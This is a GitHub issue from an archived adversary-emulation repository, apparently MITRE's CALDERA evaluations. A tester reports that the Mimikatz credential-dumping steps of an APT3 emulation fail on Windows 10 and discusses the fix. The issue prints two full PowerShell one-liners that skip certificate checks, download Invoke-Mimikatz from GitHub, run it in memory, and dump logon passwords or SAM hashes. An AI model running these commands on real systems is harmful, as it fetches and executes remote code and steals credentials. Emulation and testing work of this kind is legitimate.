This repository has been archived by the owner on Sep 14, 2023. It is now read-only.

[Plugin Phases 14 & 15 ] 5.A.1 - Credential Dumping (T1003) & 5.A.2 - Credential Dumping (T1003) using Process Injection (T1055) - Mimikatz Update #3

Closed
Cyb3rWard0g opened this issue Oct 16, 2019 · 2 comments

Comments

@Cyb3rWard0g

Good evening team,

This issue goes along with:

because they are from the same setup and operation execution (APT3 - Full)

When I got to steps 5.A.1 - Credential Dumping (T1003) & 5.A.2 - Credential Dumping (T1003) using Process Injection (T1055), Mimikatz failed to run.

Script step 5.A.1 : https://github.com/mitre-attack/evals_caldera/blob/1b3f5ffc882d8f46e689a134137af8138f3a43d0/data/abilities/credential-access/4ef6009d-2d62-4bb4-8de9-0458df2e9567.yml

Output:

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };$web = (New-Object System.Net.WebClient);$result = $web.DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1");iex $result;function logonpasswords{ Invoke-Mimikatz -Command "privilege::debug sekurlsa::logonpasswords exit"};logonpasswords;
Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
At line:886 char:9
+         $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddr ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : AmbiguousMatchException
 
You cannot call a method on a null-valued expression.
At line:893 char:9
+         Write-Output $GetProcAddress.Invoke($null, @([System.Runtime. ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull
 
Cannot find an overload for "GetDelegateForFunctionPointer" and the argument count: "2".
At line:489 char:9
+         $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::Get ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodException
    + FullyQualifiedErrorId : MethodCountCouldNotFindBest
 
Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
At line:886 char:9
+         $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddr ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : AmbiguousMatchException
 
You cannot call a method on a null-valued expression.
At line:893 char:9
+         Write-Output $GetProcAddress.Invoke($null, @([System.Runtime. ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

and more...

Script step 5.A.2 - Credential Dumping (T1003) using Process Injection (T1055): https://github.com/mitre-attack/evals_caldera/blob/1b3f5ffc882d8f46e689a134137af8138f3a43d0/data/abilities/credential-access/effbedc1-1bc8-4a75-9395-980559700008.yml

Output:

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };$web = (New-Object System.Net.WebClient);$result = $web.DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1");iex $result;function hashdump{ Invoke-Mimikatz -Command "privilege::debug token::elevate lsadump::sam exit"};hashdump;
Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
At line:886 char:9
+         $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddr ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : AmbiguousMatchException
 
You cannot call a method on a null-valued expression.
At line:893 char:9
+         Write-Output $GetProcAddress.Invoke($null, @([System.Runtime. ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull
 
Cannot find an overload for "GetDelegateForFunctionPointer" and the argument count: "2".
At line:489 char:9
+         $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::Get ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodException
    + FullyQualifiedErrorId : MethodCountCouldNotFindBest
 
Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
At line:886 char:9
+         $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddr ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : AmbiguousMatchException
 
You cannot call a method on a null-valued expression.
At line:893 char:9
+         Write-Output $GetProcAddress.Invoke($null, @([System.Runtime. ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

and more...

I was doing some reading and also remembered seeing something similar when playing with Empire (master branch). I remember switching to the DEV branch and it worked properly with Win10. Remember I am using The Shire Mordor Environment and my workstations are Win10 and servers are Win 2019. They are all configured to the setup standards from the evals.

I also saw this issue in the Caldera repo which confirmed what I was thinking when I saw those initial error messages: mitre/caldera#38

I confirmed that Mimikatz in Empire Master branch does not have that fix applied. However, DEV branch does have it. I believe the following needs to be updated then:

I can submit a PR too, but I wanted to first check with you guys. I will give it a try with those two fixes soon.

Thank you in advance!

@Cyb3rWard0g
Author

This was updated with the latest Mimikatz release: https://raw.githubusercontent.com/hunters-forge/Blacksmith/master/aws/mordor/cfn-files/scripts/Invoke-Mimikatz.ps1

UPDATED $PEBytes64 strings - 2.2.0-20190813 Release - Updated 10/20/2019

@jondricek
Contributor

Admin note: closing all remaining issues and pull requests prior to archiving the repository
